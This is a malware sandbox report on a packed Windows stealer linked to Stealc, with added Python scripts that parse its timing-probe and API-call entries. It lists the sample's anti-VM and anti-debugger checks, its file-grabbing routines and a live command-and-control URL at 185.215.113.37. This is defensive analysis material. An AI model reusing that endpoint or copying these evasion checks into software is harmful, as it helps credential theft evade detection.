Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_006E38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_006E4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_006DDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_006DE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_006E4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_006DED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_006DBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_006DDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_006D16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_006E3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_006DF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D1160 GetSystemInfo,ExitProcess | 0_2_006D1160
Source: file.exe, file.exe, 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
Source: file.exe, 00000000.00000002.1823830492.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823830492.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwarev
Source: file.exe, 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13631
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13628
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13647
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13643
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13683
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
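Each interceptor entry above records one pair of consecutive rdtsc executions: the address of both reads and the instructions the sandbox traced between them, with offsets that accumulate the sizes of the executed instructions. The script below is an added example (it is not part of the Joe Sandbox report and not code from the sample) that parses such entries, links an entry whose second address is another entry's first address into a chain, separates the packer's filler (stack shuffles and jumps) from every other instruction, and measures how many bytes inside each pair were never executed. The filler classification, the field names and the choice of embedded lines are ours; the embedded lines themselves are copied from the entries above.

```python
"""Parse Joe Sandbox 'RDTSC instruction interceptor' entries into probe chains."""
import re
from dataclasses import dataclass

# Sample lines copied from the report's RDTSC interceptor entries for file.exe
# (the selection is ours; the text is the report's).
REPORT_LINES = [
    "RDTSC instruction interceptor: First address: B707FB second address: B70801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
    "RDTSC instruction interceptor: First address: B70801 second address: B70815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc",
    "RDTSC instruction interceptor: First address: B70815 second address: B7081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    "RDTSC instruction interceptor: First address: 4C102B8 second address: 4C102D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc",
    "RDTSC instruction interceptor: First address: 4C102D0 second address: 4C102D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: 4C102D4 second address: 4C102E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc",
    "RDTSC instruction interceptor: First address: 4C10358 second address: 4C10374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ecx, 2A2BBAE3h 0x00000013 rdtsc",
]

_HEADER = re.compile(
    r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)"
    r"\s+instructions:\s*(.*)$")
# One traced instruction: an 8-digit hex offset, then its text up to the next
# offset. Jump targets such as 00007F33B8517E9Fh carry no 0x prefix, so they
# cannot be mistaken for an offset.
_INSN = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.+?)(?=\s+0x[0-9A-Fa-f]{8}\s|$)")

# Stack shuffles and jumps do no computation; they are the mutation junk the
# packer inserts between the two time-stamp reads (our classification).
_JUNK = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "jmp"}


def is_junk(insn: str) -> bool:
    mnemonic = insn.split()[0]
    return mnemonic in _JUNK or mnemonic.startswith("j")  # jcc family


@dataclass
class Probe:
    first: int      # address of the first rdtsc
    second: int     # address of the second rdtsc
    insns: list     # (offset, text) pairs as traced by the sandbox

    @property
    def span(self) -> int:
        return self.second - self.first

    @property
    def executed_len(self) -> int:
        # offsets accumulate executed instruction sizes, so the offset of the
        # closing rdtsc is the number of bytes actually run between the reads
        return self.insns[-1][0]

    @property
    def skipped(self) -> int:
        # bytes between the two reads that were never executed; positive when
        # the trace left the linear byte range, i.e. a jmp hopped over junk
        return self.span - self.executed_len

    def filler(self) -> list:
        return [text for _, text in self.insns[1:-1]]


def parse_probe(line: str) -> Probe:
    m = _HEADER.search(line)
    if not m:
        raise ValueError("not an RDTSC interceptor line: %r" % line)
    insns = [(int(off, 16), text.strip()) for off, text in _INSN.findall(m.group(3))]
    if not insns or insns[0][1] != "rdtsc" or insns[-1][1] != "rdtsc":
        raise ValueError("trace is not bracketed by rdtsc: %r" % line)
    return Probe(int(m.group(1), 16), int(m.group(2), 16), insns)


def build_chains(probes):
    """Link probes whose second address is another probe's first address."""
    by_first = {p.first: p for p in probes}
    continuations = {p.second for p in probes}
    chains = []
    for head in sorted(probes, key=lambda p: p.first):
        if head.first in continuations:
            continue  # reached from an earlier probe, not a chain head
        chain = [head]
        while chain[-1].second in by_first:
            chain.append(by_first[chain[-1].second])
        chains.append(chain)
    return chains


def summarize(chain):
    filler = [i for p in chain for i in p.filler()]
    return {
        "start": chain[0].first,
        "end": chain[-1].second,
        "rdtsc_reads": len(chain) + 1,  # adjacent probes share one rdtsc
        "bytes": chain[-1].second - chain[0].first,
        "junk": sum(1 for i in filler if is_junk(i)),
        "real": [i for i in filler if not is_junk(i)],
        "skipped": sum(p.skipped for p in chain),
    }


def analyze(lines):
    return [summarize(c) for c in build_chains([parse_probe(l) for l in lines])]


if __name__ == "__main__":
    for s in analyze(REPORT_LINES):
        print("%07X-%07X %d rdtsc %3d bytes junk=%2d skipped=%2d real=%s" % (
            s["start"], s["end"], s["rdtsc_reads"], s["bytes"],
            s["junk"], s["skipped"], s["real"]))
```

Run stand-alone it prints one row per chain. The chain starting at B707FB is four rdtsc reads inside 32 bytes with nothing but pushes, pops and a jmp between them, a pure timing probe. The two 4C10xxx chains leave `xchg eax, ebp`, a `push eax` and `mov ebp, esp` once the filler is stripped, which reads like a `push ebp; mov ebp, esp` prologue that the mutation engine has interleaved with the timing checks; the positive skipped counts are bytes inside a pair that a forward jmp hopped over, the usual junk-byte anti-disassembly trick. The chain start addresses are where to break or patch when the checks need neutralising in a debugger.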

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D45C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_006D45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_006E9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E9750 mov eax, dword ptr fs:[00000030h] | 0_2_006E9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_006E7850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_006E9600
Source: file.exe, file.exe, 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ^Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_006E7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_006E6920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_006E7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_006E7A30
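The "Code function" entries, here and in the anti-analysis section above, give the Windows APIs each function of the unpacked sample reaches, in call order. That order is enough to name a behaviour the way capa does: FindFirstFileA followed by CopyFileA, DeleteFileA and FindNextFileA is the shape of a file grabber, CreateToolhelp32Snapshot followed by Process32Next and a string compare is process discovery by name. Added example, not from the report and not the sample's code: an ordered-subsequence matcher with a pattern table of our own, run over lines copied from the "Code function" entries on this page (one line abbreviated, as noted in the comment). The behaviour names are ours.

```python
"""Name behaviours in Joe Sandbox 'Code function' entries by ordered API-call patterns."""
import re

# Sample lines copied from the report's 'Code function' entries for file.exe
# (our selection; the text is the report's, except the abbreviated line).
CODE_FUNCTION_LINES = [
    "Code function: 0_2_006E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006E38B0",
    "Code function: 0_2_006DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_006DDA80",
    "Code function: 0_2_006DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_006DED20",
    # abbreviated: the report's line repeats GetProcAddress many more times
    "Code function: 0_2_006E9860 GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,0_2_006E9860",
    "Code function: 0_2_006E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_006E9600",
    "Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_006E7B90",
    "Code function: 0_2_006E6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_006E6920",
]

# Ordered API subsequences (our own table, not the sandbox's rules) and the
# behaviour each indicates when the calls occur in this order.
PATTERNS = {
    "directory walk that copies files": ["FindFirstFileA", "CopyFileA", "FindNextFileA", "FindClose"],
    "deletes files while walking": ["FindFirstFileA", "DeleteFileA", "FindNextFileA"],
    "filters filenames against a spec": ["FindFirstFileA", "PathMatchSpecA"],
    "enumerates processes by name": ["CreateToolhelp32Snapshot", "Process32First", "Process32Next", "StrCmpCA"],
    "resolves imports at runtime": ["LoadLibraryA", "GetProcAddress"],
    "compares the clock and exits": ["GetSystemTime", "SystemTimeToFileTime", "ExitProcess"],
    "fingerprints keyboard layout/locale": ["GetKeyboardLayoutList", "GetLocaleInfoA"],
}

# The function id may lead the call list, trail it (after a comma or a
# separator), or both; the trailing one is always present in the report.
_LINE = re.compile(
    r"Code function:\s*(?:(0_2_[0-9A-Fa-f]+)\s+)?(.*?)[\s,|]*(0_2_[0-9A-Fa-f]+)\s*$")


def parse_code_function(line: str):
    """Return (function id, list of API names in call order)."""
    m = _LINE.search(line)
    if not m:
        raise ValueError("not a Code function line: %r" % line)
    func = m.group(1) or m.group(3)
    calls = [c.strip() for c in m.group(2).split(",") if c.strip()]
    return func, calls


def has_subsequence(calls, pattern) -> bool:
    """True if every name in pattern occurs in calls, in that order (gaps allowed)."""
    it = iter(calls)  # shared iterator: each any() consumes up to its match
    return all(any(c == want for c in it) for want in pattern)


def triage(lines):
    """Map each function id to the behaviour names whose pattern it matches."""
    findings = {}
    for line in lines:
        func, calls = parse_code_function(line)
        findings[func] = [name for name, pat in PATTERNS.items() if has_subsequence(calls, pat)]
    return findings


def functions_with(findings, behaviour):
    return sorted(f for f, names in findings.items() if behaviour in names)


if __name__ == "__main__":
    for func, names in triage(CODE_FUNCTION_LINES).items():
        print(func, "->", ", ".join(names) or "(no pattern matched)")
```

The subsequence test deliberately tolerates the StrCmpCA, wsprintfA and lstrcat calls between the anchor APIs, so it keeps matching when the compiler or the packer reorders bookkeeping calls; 0_2_006DDA80, which walks a directory without copying or deleting, correctly matches nothing. The same table can be extended with the VirtualProtect and GetProcAddress-heavy functions from the anti-debugging section to build a per-sample behaviour profile.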

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (techniques listed per tactic column; a number in parentheses is the count the page attaches to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.phpo | 17% | Virustotal | | Browse
http://185.215.113.37/e2b1563c6670f193.phpw | 17% | Virustotal | | Browse
http://185.215.113.37/e2b1563c6670f193.phpc | 17% | Virustotal | | Browse
http://185.215.113.37/ws | 17% | Virustotal | | Browse
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware; URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37_ | file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpot:j | file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpo | file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpWHjj | file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpc | file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpw | file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522427
Start date and time: 2024-09-30 03:23:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 91
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Amadey, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Amadey, Stealc | Browse | 185.215.113.103
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                      No context
                      No context
                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9493193257263925
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'872'384 bytes
MD5: dc92ce1751a7abfe2c6232ae8fcdd321
SHA1: dccd40639ea30f104ff1daf9d51f6f8e76efc2ed
SHA256: 16302289d512b8fbc68c2ef8eb4d3bcebdc7f5bf353785390a14d4c5dfbee672
SHA512: 4e810d9b0f7ee05e66c6fc96274c46595175012713981790660fe39aaae5837655a8c24629ef50b3e45112ed5a3bd8e1a4dbb02ab46d5e174a1f9b87291266a1
SSDEEP: 49152:ERIK1zz0HB7M1Wi8F+bNs3AwEMA89qTXa9VN+uL:o3z0M1t8F4UAwEMRqTXKC0
TLSH: 5585332AFEB3D33EC09E2DF9C7B727FA531446C880AAC2C58FDDA05D5420657399095A
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xaac000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
